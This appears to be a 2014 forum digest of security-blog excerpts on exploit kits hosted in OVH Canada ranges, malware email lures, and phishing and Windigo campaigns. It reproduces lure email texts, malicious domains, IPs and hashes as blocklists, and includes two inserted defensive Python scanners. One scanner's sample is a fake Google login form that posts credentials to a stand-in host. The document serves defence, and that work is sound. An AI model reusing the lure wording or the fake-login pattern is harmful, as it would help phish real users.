Exploit Kits - OVH Canada / r5x .org ...
FYI...
Exploit Kits - OVH Canada / r5x .org / Penziatki
- http://blog.dynamoo.com/2014/03/evil...penziatki.html
13 Mar 2014 - "Hat tip to Frank Denis (@jedisct1)* for this report** on Nuclear EK's hosted by OVH Canada using their infamous "Penziatki" customer which is linked to black-hat host r5x .org***. The blocks have been identified as belonging to that customer and I would recommend that you block them:
198.27.114.16/30
198.27.114.64/27
198.50.186.232/30
198.50.186.236/30
198.50.186.252/30
198.50.231.204/30
OVH Canada have repeatedly hosted exploit kits for this customer... If you are in a security-sensitive environment then you might simply want to block traffic to the following ranges:
198.27.0.0/16
198.50.0.0/16
Of course this will block many legitimate sites, but if stopping exploit kits is a priority over some user inconvenience then you may want to consider it. If you want a slightly more nuanced blocklist then these ranges contain the biggest concentration of malware:
198.27.114.0/24
198.50.172.0/24
198.50.186.0/24
198.50.197.0/24
198.50.231.0/24 ..."
(More detail at the dynamoo URL above.)
* https://twitter.com/jedisct1
** https://gist.github.com/jedisct1/9509527 - Nuclear Exploit Kit Mar 12
*** http://blog.dynamoo.com/search/label/R5X.org
> http://google.com/safebrowsing/diagnostic?site=AS:16276
___
Malware sites to block 13/3/14
- http://blog.dynamoo.com/2014/03/malw...ock-13313.html
13 Mar 2014 - "These IPs and domains seem to be involved in injection attacks today. I recommend you block them.
64.120.242.178
188.226.132.70
93.189.46.90 ...
The domains being abused are as follows.. many of them appear to be hijacked legitimate domains..."
(Many others listed at the dynamoo URL above.)
___
Fake Blood count result - fake PDF malware
- http://myonlinesecurity.co.uk/import...e-pdf-malware/
13 Mar 2014 - "This email saying IMPORTANT Complete blood count result pretending to come from NICE (National Institute for Health and Care Excellence) has to be the most vicious and evil attempt by any malware purveyor to try to infect a victim. Sending an email saying that you probably have cancer will alarm & distress so many people and is just the most offensive and disgusting attempt to trick a user into opening a malware attachment... another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Other subjects in this evil email attempt to infect you are:
- IMPORTANT:Blood analysis result
- IMPORTANT:Blood analysis
- IMPORTANT:Complete blood count (CBC)result ...
> http://myonlinesecurity.co.uk/wp-con...-CBCresult.png
... 13 March 2014: CBC_Result_9B4824B65E.zip (55kb) Extracts to CBC_scaned_584444449.pdf.exe
Current Virus total detections: 2/50*... careful when unzipping them and make sure you have “show known file extensions enabled"**, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
* https://www.virustotal.com/en/file/d...is/1394703905/
** http://myonlinesecurity.co.uk/why-yo...wn-file-types/
___
Key Secured Message -fake- PDF malware
- http://myonlinesecurity.co.uk/key-se...e-pdf-malware/
13 March 2014 - "Key Secured Message pretending to come from Payroll Reports <payroll @quickbooks .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details...
> http://myonlinesecurity.co.uk/wp-con...ed-Message.png
... Extracts to NIKON-2013564-JPEG.scr ... Current Virus total detections: 2/50*
This Key Secured Message is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en-gb/fil...55c2/analysis/
___
Fake Sky .com "Statement of account" SPAM
- http://blog.dynamoo.com/2014/03/skyc...ount-spam.html
13 Mar 2014 - "This -fake- Sky .com email comes with a malicious attachment:
Date: Thu, 13 Mar 2014 12:23:09 +0100 [07:23:09 EDT]
From: "Sky .com" [statement@ sky .com]
Subject: Statement of account
Afternoon,
Please find attached the statement of account.
We look forward to receiving payment for the December invoice as this is now due for
payment.
Regards, Carmela ...
Wilson McKendrick LLP Solicitors ...
Attached is an archive Statement.zip which in turn contains a malicious executable Statement.scr which has a VirusTotal detection rate of 6/50*. Automated analysis tools... show attempted connections to the following domains and IPs:
188.247.130.190 (Prime Telecom SRL, Romania)
gobemall .com
gobehost .info
184.154.11.228 (Singlehop, US)
terenceteo .com
184.154.11.233 (Singlehop, US)
quarkspark .org
The two Singlehop IPs appear to belong to Host The Name (hostthename .com) which perhaps indicates a problem at that reseller.
Recommended blocklist:
184.154.11.228
184.154.11.233
188.247.130.190
gobemall .com
gobehost .info
terenceteo .com
quarkspark .org "
* https://www.virustotal.com/en-gb/fil...is/1394715270/
___
HM Revenue & Customs Spam
- http://threattrack.tumblr.com/post/7...e-customs-spam
Mar 12, 2014 - "Subjects Seen:
HMRC Tax Notice
Typical e-mail details:
Dear <email address>
Please be advised that one or more Tax Notices (P6, P6B) have been issued.
For the latest information on your Tax Notices (P6, P6B) please open attached report.
Document Reference: 6807706.
Malicious File Name and MD5:
PDF_Scanned_HMRCBBD45F6647.zip (09BA8CF32FDDE3F73EA8F2E6F75BDF1E)
scaned_7246582_pdf_4364534533.exe (3F347C85BEA303904975FF0A8DE49E7E)
Screenshot: https://gs1.wac.edgecastcdn.net/8019...Ge41r6pupn.png
Tagged: HMRC, weelsof
Google Docs users Targeted - Phishing Scam ...
FYI...
Google Docs users Targeted - Phishing Scam
- http://www.symantec.com/connect/blog...-phishing-scam
13 Mar 2014 - "We see -millions- of phishing messages every day, but recently, one stood out: a sophisticated scam targeting Google Docs and Google Drive users. The scam uses a simple subject of "Documents" and urges the recipient to view an important document on Google Docs by clicking on the included link. Of course, the link doesn't go to Google Docs, but it does go to Google, where a very convincing fake Google Docs login page is shown:
Google Docs phishing login page:
> http://www.symantec.com/connect/site...site_image.png
The -fake- page is actually hosted on Google's servers and is served over SSL, making the page even more convincing. The scammers have simply created a folder inside a Google Drive account, marked it as public, uploaded a file there, and then used Google Drive's preview feature to get a publicly-accessible URL to include in their messages. This login page will look familiar to many Google users, as it's used across Google's services. (The text below "One account. All of Google." mentions what service is being accessed, but this is a subtlety that many will not notice.) It's quite common to be prompted with a login page like this when accessing a Google Docs link, and many people may enter their credentials without a second thought. After pressing "Sign in", the user’s credentials are sent to a PHP script on a -compromised- web server. This page then redirects to a real Google Docs document, making the whole attack very convincing. Google accounts are a valuable target for phishers, as they can be used to access many services including Gmail and Google Play, which can be used to purchase Android applications and content..."
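The tell in the Symantec write-up above is that the page is served from Google over SSL but the "Sign in" form posts the credentials to a PHP script on an unrelated compromised host. The following is an added example, not code from Symantec or the original post: a small stdlib-only Python check that parses the HTML of a page, finds every form containing a password field, resolves its action against the page URL and flags any that post to a host other than the one serving the page or a trusted login host. The page URL, the hostnames and the HTML snippet are constructed stand-ins, and the trusted-host set is an assumption.

```python
"""Flag login forms whose action posts credentials somewhere other than the serving site.

Added example, not code from the Symantec post. The HTML below is a constructed
stand-in for the fake Google Docs page; every hostname in it is invented.
"""
from html.parser import HTMLParser
from typing import List
from urllib.parse import urljoin, urlsplit

# Hosts where a genuine Google sign-in form may legitimately post.
# Assumption: a minimal set for the example, not an authoritative list.
TRUSTED_LOGIN_HOSTS = {"accounts.google.com"}


class FormCollector(HTMLParser):
    """Collect each <form> with its action and whether it contains a password input."""

    def __init__(self) -> None:
        super().__init__()
        self.forms = []          # list of {"action": str | None, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action"), "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def find_credential_exfil(page_url: str, html: str) -> List[str]:
    """Return the resolved action URL of every password form that does not post to
    the serving host or a trusted login host. An empty list means nothing suspicious."""
    collector = FormCollector()
    collector.feed(html)
    page_host = urlsplit(page_url).hostname
    off_site = []
    for form in collector.forms:
        if not form["has_password"]:
            continue
        # A missing or relative action resolves against the page URL itself.
        target = urljoin(page_url, form["action"] or "")
        host = urlsplit(target).hostname
        if host != page_host and host not in TRUSTED_LOGIN_HOSTS:
            off_site.append(target)
    return off_site


# Constructed sample modelled on the description above: a Google-hosted preview
# page whose sign-in form posts to a PHP script on an unrelated host.
SAMPLE_PAGE_URL = "https://docs.google.com/file/d/EXAMPLE-ID/preview"   # invented URL
SAMPLE_HTML = """
<html><body>
<h1>One account. All of Google.</h1>
<p>Sign in to continue to Google Docs</p>
<form method="post" action="http://compromised.example/wp-content/uploads/login.php">
  <input type="email" name="Email">
  <input type="password" name="Passwd">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

if __name__ == "__main__":
    for url in find_credential_exfil(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("password form posts off-site to", url)
```

The check deliberately ignores forms without a password field, so a search box with an off-site action does not trigger it, and it treats a relative or empty action as posting back to the serving host, which is what a real Google sign-in page does.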
___
ABSA Global business - certificate update – fake PDF malware
- http://myonlinesecurity.co.uk/absa-g...e-pdf-malware/
Mar 14, 2014 - "ABSA Global business customers 'certificate update' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. ABSA Global is a South African Bank so I wouldn’t expect a high number of US or UK citizens to have accounts with them, so this should be a quite obvious scam, phishing, malware attack to the majority of users. After examination of the malware, although many Antiviruses detect it as a Zbot, It looks more like an Androm version, possibly dropped by Asprox botnet. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details.
Attention!
On March 14, 2014 server upgrade will take place. Due to this the system may be offline for approximately half an hour.
The changes will concern security, reliability and performance of mail service and the system as a whole.
For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.
This procedure is quite simple. All you have to do is just to install new server certificate attached to the letter.
Thank you in advance for your attention to this matter and sorry for possible inconveniences.
System Administrator ABSA Global
cert p12 install instruction.zip (58kb) - Extracts to ABSA cert p12 install instruction.exe
Current Virus total detections: 11/50* ... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f...5843/analysis/
___
Fake Facebook messages
- http://myonlinesecurity.co.uk/fake-facebook-messages/
Mar 14, 2014 - "... plagued by Fake Facebook messages saying ” somebody commented on your status” (1) or “You requested a new Facebook password” (2) ...
1) http://myonlinesecurity.co.uk/wp-con...our-status.png
2) http://myonlinesecurity.co.uk/wp-con...k-password.png
Always -hover- over the links in these emails and you will see that they do -not- lead to Facebook. Do not click on the links, just delete the emails as soon as they arrive. There is always the very high possibility that one of the other botnets will use these to send you to a malicious site where your computer will be infected, rather than trying to scam you out of money by selling fake medicines that could kill you."
___
Banks to be hit with MS costs for running outdated ATMs
- http://www.reuters.com/article/2014/...0M345C20140314
LONDON/NEW YORK, March 14, 2014 - "Banks around the world, consumed with meeting more stringent capital regulations, will miss a deadline to upgrade outdated software for automated teller machines (ATMs) and face additional costs to Microsoft to keep them secure. The U.S. software company first warned that it was planning to end support for Windows XP in 2007, but only one-third of the world's 2.2 million ATMs which use the system will have been upgraded to a new platform, such as Windows 7 by the April deadline, according to NCR, one of the biggest ATM makers. To ensure the machines are protected against viruses and hackers many banks have agreed deals with Microsoft to continue supporting their ATMs until they are upgraded, extra costs and negotiations that were avoidable but are now likely to be a distraction for bank executives... Britain's five biggest banks - Lloyds Banking Group, Royal Bank of Scotland, HSBC, Barclays and Santander UK - either have, or are in the process of negotiating, extended support contracts with Microsoft. The cost of extending support and upgrading to a new platform for each of Britain's main banks would be in the region of 50 to 60 million pounds ($100 million), according to Sridhar Athreya, London-based head of financial services advisory at technology firm SunGard Consulting, an estimate corroborated by a source at one of the banks. Athreya said banks have left it late to upgrade systems after being overwhelmed by new regulatory demands in the wake of the 2007-08 financial crisis... Windows XP currently supports around 95 percent of the world's ATMs... many of the banks operating them will still be running their ATMs with Windows XP for a while after the April 8 deadline..."
___
Bogus online casino themed campaigns intercepted in the wild
- http://www.webroot.com/blog/2014/03/...ead-w32casino/
Mar 14, 2014 - "... proliferation of social engineering driven, privacy-violating campaigns serving W32/Casino variants. Relying on affiliate based revenue sharing schemes and spamvertised campaigns as the primary distribution vectors, the rogue operators behind them continue tricking tens of thousands of gullible users into installing the malicious applications. We’ve recently intercepted a series of spamvertised campaigns distributing W32/Casino variants...
Sample screenshots of the landing pages for the rogue casinos:
1) https://www.webroot.com/blog/wp-cont...ationc_PUA.png
2) https://www.webroot.com/blog/wp-cont...onc_PUA_01.png
3) https://www.webroot.com/blog/wp-cont...onc_PUA_02.png
4) https://www.webroot.com/blog/wp-cont...onc_PUA_03.png
5) https://www.webroot.com/blog/wp-cont...onc_PUA_04.png
6) https://www.webroot.com/blog/wp-cont...5-1024x576.png
Spamvertised URLs:
hxxp ://bit. ly/1brCoxg
hxxp ://bit .ly/1bQRudq
hxxp ://bit .ly/1mLQr5I
hxxp ://bit .ly/MCOyaL
hxxp ://bit .ly/1ec3UMN
hxxp ://bit .ly/1hN6Vbd
hxxp ://bit .ly/1mQ3XFu
hxxp ://bit .ly/17DJ4pZ
hxxp ://bit .ly/1ec2JNa
hxxp ://bit .ly/1fBY6d5
W32.Casino PUA domains reconnaissance:
hxxp ://rubyfortune .com – 78.24.211.177
hxxp ://grandparkerpromo .com – 95.215.61.160
hxxp ://kingneptunescasino1 .com – 67.211.111.169
hxxp ://riverbelle1 .com – 193.169.206.233
hxxp ://europacasino .com – 87.252.217.13
hxxp ://vegaspartnerlounge .com – 66.212.242.136
Sample detection rates for the W32/Casino PUA:
MD5: b80db6ec0e6c968499ce01232fbfdc5c * ... W32/Casino.P.gen!Eldorado
MD5: a2a545adf4498e409f7971f326333333 ** ... Heuristic.BehavesLike.Win32.Suspicious-DTR.S
MD5: a2a545adf4498e409f7971f326333333 *** ... W32/Casino.P.gen!Eldorado
MD5: 1cd6db7edbbc07d1c68968f584c0ac82 **** ... W32/Casino.P.gen!Eldorado
... (More) Known to have been downloaded from the same IP (87.248.203.254) ..."
* https://www.virustotal.com/en/file/1...is/1394642298/
** https://www.virustotal.com/en/file/4...is/1394642439/
*** https://www.virustotal.com/en/file/3...is/1394643637/
**** https://www.virustotal.com/en/file/4...is/1394643413/
Something evil on 198.50.140.64/27, 192.95.6.196/30 ...
FYI...
Something evil on 198.50.140.64/27
- http://blog.dynamoo.com/2014/03/some...501406427.html
17 Mar 2014 - "Thanks again to Frank Denis (@jedisct1) for this heads up* involving grubby web host OVH Canada and their black hat customer "r5x .org / Penziatki" hosting the Nuclear EK in 198.50.140.64/27. A full list of all the web sites I can find associated with this range can be found here**, but the simplest thing to do is block 198.50.140.64/27 completely (or if you are paranoid about security and don't mind some collateral damage block 198.27.0.0/16 and 198.50.0.0/16). Domains in use that I can identify are listed below. I recommend you block -all- of them. Domains listed as malicious by Google are in red, those listed as suspect by SURBL are in italics.
Recommended blocklist:
198.50.140.64/27
ingsat .eu
kingro .biz ..."
(More detail and domains listed at the dynamoo URL above.)
* https://twitter.com/jedisct1/status/445220289534631937
** http://pastebin.com/kkPRKu6v
___
Something evil on 192.95.6.196/30
- http://blog.dynamoo.com/2014/03/some...295619630.html
17 Mar 2014 - "Another useful tip by Frank Denis* on evil in the OVH Canada IP ranges, suballocated to their black hat customer "r5x .org / Penziatki", this time on 192.95.6.196/30. The following domains should be considered as dangerous and I would recommend blocking them as soon as possible:
shoalfault .ru
addrela .eu
backinl .org
A full list of the domains I can find in this /30 can be found here** [pastebin].
Given the extremely poor reputation of these OVH Canada ranges, I would suggest blocking the following network ranges if you have a security-sensitive environment and are prepared to put up with the collateral damage of blocking some legitimate sites:
198.27.0.0/16
198.50.0.0/16
198.95.0.0/16 "
* https://twitter.com/jedisct1/status/445690516433145856
** http://pastebin.com/RWG8uj00
___
Bank of America / Merrill Lynch - Completion of request for ACH CashPro – fake PDF malware
- http://myonlinesecurity.co.uk/bank-a...e-pdf-malware/
Mar 17, 2014 - "Bank of America Merrill Lynch Completion of request for ACH CashPro is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details...
> http://myonlinesecurity.co.uk/wp-con...CH-CashPro.png
17 March 2014 securedoc.zip (12kb) Extracts to securedoc.exe
Current Virus total detections: 2/49* - MALWR Auto Analysis**
This Bank of America Merrill Lynch Completion of request for ACH CashPro is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* https://www.virustotal.com/en/file/4...9bf5/analysis/
** https://malwr.com/analysis/Njc2MjY3Y...VhYTEyMzI4OTY/
___
Injection attack in progress 17/3/14
- http://blog.dynamoo.com/2014/03/inje...ess-17314.html
17 Mar 2014 - "A couple of injection attacks seem to be in progress, I haven't quite got to the bottom of them yet.. but you might want to block the following domains:
fsv-hoopte-winsen .de
grupocbi .com
These are hosted on 82.165.77.21 and 72.47.228.162 respectively. The malware is resistant to automated tools and redirects improperly-formed attempts to analyse it to Bing [1] [2]. The malware is appended to hacked .js files on target sites... This sort of attack has been used to push -fake- software updates* in the past. Even though I can't quite get to the bottom of this at the moment, you can be pretty sure that this is Nothing Good and I would recommend blocking these domains."
1) http://urlquery.net/report.php?id=9933756
2) http://urlquery.net/report.php?id=9933677
* http://blog.dynamoo.com/2014/01/scri...end-media.html
___
Fake Personal message from Gmail Service – spam
- http://myonlinesecurity.co.uk/fake-p...-service-spam/
Mar 17, 2014 - "< your name> Personal message from Gmail Service is an alternative version of the Fake Facebook messages*. Just like the Facebook versions these either take you to a Women’s Health page trying to sell you fake drugs for slimming or other women’s problems. Other days they send you to one of the Canadian or Russian Pharmacy pages selling Viagra, valium or other illegal drugs.
Fake Personal message from Gmail Service
> http://myonlinesecurity.co.uk/wp-con...il-message.png
Always -hover- over the links in these emails and you will see that they do -not- lead to Gmail. Do -not- click on the links, just delete the emails as soon as they arrive. There is always the very high possibility that one of the other -botnets- will use these to send you to a malicious site where your computer will be infected, rather than trying to scam you out of money by selling fake medicines..."
* http://myonlinesecurity.co.uk/fake-facebook-messages/
___
Fake Salesforce/Quickbooks invoice - malware
- http://blog.dynamoo.com/2014/03/sale...d-overdue.html
Mar 17, 2014 - "This -fake- Salesforce spam comes with a malicious attachment... actually two malicious attachments..
Date: Mon, 17 Mar 2014 16:12:20 +0100 [11:12:20 EDT]
From: "support @ salesforce .com" [support @ salesforce .com]
Subject: Please respond - overdue payment
Priority: High Priority 2
Please find attached your invoices for the past months. Remit the payment by 01/9/2013 as outlines under our "Payment Terms" agreement.
Thank you for your business,
Sincerely,
Alvaro Rocha
This e-mail has been sent from an automated system...
Attached are two archive files quickbook_invoice_89853654.rar and quickbook_invoice_8988561346654.zip which in turn contain the same malicious executable quickbook_invoice.scr which has a VirusTotal detection rate of 8/49*. Automated analysis tools... don't give much of a clue as to what is going on..."
* https://www.virustotal.com/en-gb/fil...is/1395087978/
AMEX phish, Gov't Biz Dept SPAM ...
FYI...
AMEX phish...
- http://myonlinesecurity.co.uk/americ...hing-attempts/
Mar 18, 2014 - "We are seeing quite a few American Express -phishing- attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. They are using literally hundreds if not thousands of -hijacked- websites to perform these attacks. The site listed in the email is the first step in the chain and you are bounced on to other sites. The coding on the primary hijacked sites suggests that they are under the control of the Blackhole and Angler exploit kit criminals. This means that at any time when they have stolen enough identities and money, they will switch to spreading malware via the same network and emails. Do not click any links in these emails. Hover your mouse over the links and you will see a web address that isn’t American Express. Immediately -delete- the email; the safest way to make sure that it isn’t a genuine email from American Express is to type the American Express web address in your browser and then log in to the account that way. There are currently 2 main avenues of the American Express phishing attempts:
AmericanExpress phishing attempts:
1) http://myonlinesecurity.co.uk/wp-con...hing-email.png
2) http://myonlinesecurity.co.uk/wp-con...hing-email.png
Following the link in these takes you to a website that looks exactly like the real American Express site. You are then taken through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it). They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life..."
___
Gov't Biz Dept. – fake PDF malware
- http://myonlinesecurity.co.uk/govern...e-pdf-malware/
Mar 18, 2014 - "Government Business Departament, pretending to come from Department for Business Innovation & Skills <business_dep@ gov .uk>, is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Please note the poor -spelling- in the email subject, which should be enough of a flag to warn users of the -fake- . Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details.
> http://myonlinesecurity.co.uk/wp-con...epartament.png
... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___
Fake YouTube email – fake mov malware
- http://myonlinesecurity.co.uk/receiv...e-mov-malware/
Mar 18, 2014 - "'You have received a YouTube video' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details... plain simple email with subject You have received a YouTube video and content just says 'Sent from my iPad'...
18 March 2014 : VIDEO_819562694.MOV.ZIP (79kb) : Extracts to VIDEO_890589685.MOV.exe
Current Virus total detections: 6/50*
... another one of the spoofed icon files... will look like a proper mov ( movie) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5...69ae/analysis/
Screenshot: https://gs1.wac.edgecastcdn.net/8019...ywx1r6pupn.png
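Every one of the fake-PDF posts above (CBC result, Key Secured Message, ABSA certificate, Bank of America CashPro, the YouTube .MOV lure) and the dynamoo Sky, NatWest and Salesforce samples share the same trick: a zip attachment whose member is an .exe or .scr carrying an icon and a name that reads as a document or picture (CBC_scaned_584444449.pdf.exe, NIKON-2013564-JPEG.scr, VIDEO_890589685.MOV.exe). The advice to enable "show known file extensions" protects one user at a time; at the mail gateway the same check can be automated. The following is an added example, not code from myonlinesecurity.co.uk or dynamoo.com: a stdlib-only Python script that parses a raw message, opens each zip attachment in memory, and flags members (and bare attachments) whose real extension is executable, noting when the stem ends in a document-like pseudo-extension. The sample message, its archive and the sender addresses are constructed inline; the extension sets are my own working subsets, not exhaustive lists.

```python
"""Flag e-mail attachments that hide an executable behind a document-looking name.

Added example, not code from the original posts. The sample message and the
archive inside it are constructed here so the script runs offline.
"""
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from typing import List, Optional, Tuple

# Extensions Windows will execute on double-click.  Assumption: a practical
# subset chosen for the example, not an exhaustive list.
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
             "vbs", "vbe", "wsf", "hta", "cpl"}
# Document / media extensions the lures on this page imitate (also a subset).
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "mov", "p12", "txt"}

# Matches a stem that ends in ".pdf", "-JPEG", "_mov" and so on.
_LOOKALIKE = re.compile(r"[^a-z0-9](" + "|".join(sorted(DOC_EXTS)) + r")$")


def classify_name(name: str) -> Optional[str]:
    """Return a reason if *name* is an executable (optionally disguised), else None."""
    base = name.lower().rsplit("/", 1)[-1]          # drop any directory inside the zip
    stem, sep, ext = base.rpartition(".")
    if not sep or ext not in EXEC_EXTS:
        return None
    m = _LOOKALIKE.search(stem)
    if m:
        return f"executable .{ext} disguised as {m.group(1)}"
    return f"executable .{ext}"


def scan_zip(data: bytes) -> List[Tuple[str, str]]:
    """Return (member name, reason) for every suspicious member of an in-memory zip."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            reason = classify_name(info.filename)
            if reason:
                hits.append((info.filename, reason))
    return hits


def scan_message(raw: bytes) -> List[Tuple[str, str, str]]:
    """Return (attachment, member, reason) for each disguised executable in a raw message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in msg.iter_attachments():
        fname = part.get_filename() or "(unnamed)"
        payload = part.get_payload(decode=True) or b""
        if fname.lower().endswith(".zip") or payload[:2] == b"PK":
            try:
                for member, reason in scan_zip(payload):
                    findings.append((fname, member, reason))
            except zipfile.BadZipFile:
                findings.append((fname, "", "claims to be a zip but is not a valid archive"))
        elif fname.lower().endswith(".rar") or payload[:4] == b"Rar!":
            # The Salesforce sample above also shipped a .rar; stdlib cannot open it.
            findings.append((fname, "", "RAR archive not inspected (no stdlib support)"))
        else:
            reason = classify_name(fname)
            if reason:
                findings.append((fname, fname, reason))
    return findings


def build_sample_message() -> bytes:
    """Construct a message modelled on the lures above (a constructed sample, not a capture)."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as zf:
        zf.writestr("CBC_scaned_584444449.pdf.exe", b"MZ\x90\x00 stand-in bytes, not a real binary")
        zf.writestr("README.txt", b"harmless text")
    msg = EmailMessage()
    msg["From"] = "NICE <results@example.invalid>"      # invented sender
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "IMPORTANT:Complete blood count (CBC)result"
    msg.set_content("Please see the attached result.")
    msg.add_attachment(zbuf.getvalue(), maintype="application", subtype="zip",
                       filename="CBC_Result_9B4824B65E.zip")
    msg.add_attachment(b"MZ stand-in", maintype="application", subtype="octet-stream",
                       filename="NIKON-2013564-JPEG.scr")
    return bytes(msg)


if __name__ == "__main__":
    for attachment, member, reason in scan_message(build_sample_message()):
        print(f"{attachment}: {member or '-'}: {reason}")
```

The check keys on the real final extension, so it is unaffected by whatever icon the binary carries, and the lookalike pattern also catches stems separated by "-" or "_" (NIKON-2013564-JPEG.scr), not just a literal ".pdf.exe". Name-based inspection is cheap but not sufficient on its own: it will not see inside password-protected or RAR archives, which is why those cases are reported rather than silently passed.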
___
500,000 PCs attacked after 25,000 UNIX servers hijacked ...
- http://www.welivesecurity.com/2014/0...ation-windigo/
Mar 18, 2014 - "... Researchers at ESET, in collaboration with CERT-Bund, the European Organization for Nuclear Research (CERN), the Swedish National Infrastructure for Computing and other agencies, have uncovered a widespread cybercriminal operation that has seized control of tens of thousands of Unix servers. And if your system is found to be infected, experts strongly recommend you re-install the operating system, and consider all credentials used to log into the machine as compromised. In short, if you are a victim, all passwords and private OpenSSH keys should be changed. The attack, which has been given the name “Windigo” after a mythical creature from Algonquian Native American folklore, has resulted in over 25,000 Unix servers being hacked, resulting in 35 million spam messages being sent each day from compromised machines...
> http://www.welivesecurity.com/wp-con...digo-spam.jpeg
... That would be bad enough, normally. But in this case, malicious hackers have also been using hijacked web servers to infect visiting Windows PCs with click fraud and spam-sending malware, and display dating website adverts to Mac users. Even smartphone users don’t escape – finding their iPhones redirected to X-rated content, with the intention of making money for the cybercriminals...
> http://www.welivesecurity.com/wp-con...go-iphone.jpeg
ESET’s security research team has published a detailed technical paper* into “Operation Windigo”, and says it believes that the cybercrime campaign has been gathering strength, largely unnoticed by the security community, for over two and a half years..."
An analysis of the visiting computers revealed a wide range of operating systems being used:
> http://www.welivesecurity.com/wp-con...ims-by-os.jpeg
(More detail at the welivesecurity URL at the top.)
* http://www.welivesecurity.com/wp-con...on_windigo.pdf
Indicators of Compromise
- https://github.com/eset/malware-ioc
OVH Canada hosted exploit kits, Twitter Spamrun ...
FYI...
More OVH Canada hosted exploit kits
- http://blog.dynamoo.com/2014/03/more...loit-kits.html
19 Mar 2014 - "... Yesterday Frank identified three new OVH Canada ranges* being used to host the Nuclear EK [1], again the customer is "r5x .org / Penziatki"
198.50.212.116/30
198.50.131.220/30
192.95.40.240/30
Update: also 192.95.51.164/30 according to this Tweet**... A full list of everything I can find is here*** [pastebin] ... At a minimum I recommend that you block those IP ranges and/or domains.
Given the extremely poor reputation of these OVH Canada ranges, I would suggest blocking the following network ranges if you have a security-sensitive environment and are prepared to put up with the collateral damage of blocking some legitimate sites:
198.27.0.0/16
198.50.0.0/16
198.95.0.0/16 "
(More detail at the dynamoo URL above.)
* https://twitter.com/jedisct1/status/445970337490927616
** https://twitter.com/jedisct1/status/446154856093343744
*** http://pastebin.com/4eGWBwHV
1] http://krebsonsecurity.com/tag/nuclear-exploit-pack/
Updated - Mar 20, 2014: http://blog.dynamoo.com/search/label/OVH
___
Something evil on 64.120.242.160/27
- http://blog.dynamoo.com/2014/03/some...024216027.html
19 Mar 2014 - "64.120.242.160/27 (Network Operations Center, US) is hosting a number of exploit domains (see this example report at VirusTotal*). There appears to be a variety of badness involved, and many of the domains hosted in the range are flagged as malicious by Google or SURBL (report here** [csv]). There appears to be nothing legitimate in this whole range. Domains flagged as malicious by Google are highlighted, ones marked as malicious by SURBL are in italics. I would recommend you block the entire lot.
64.120.242.160/27
asifctuenefcioroxa .net
hukelmshiesuy .net
asifctuenefcioroxa .com
asifctuenefcioroxa .info ..."
(Long list at the dynamoo URL above.)
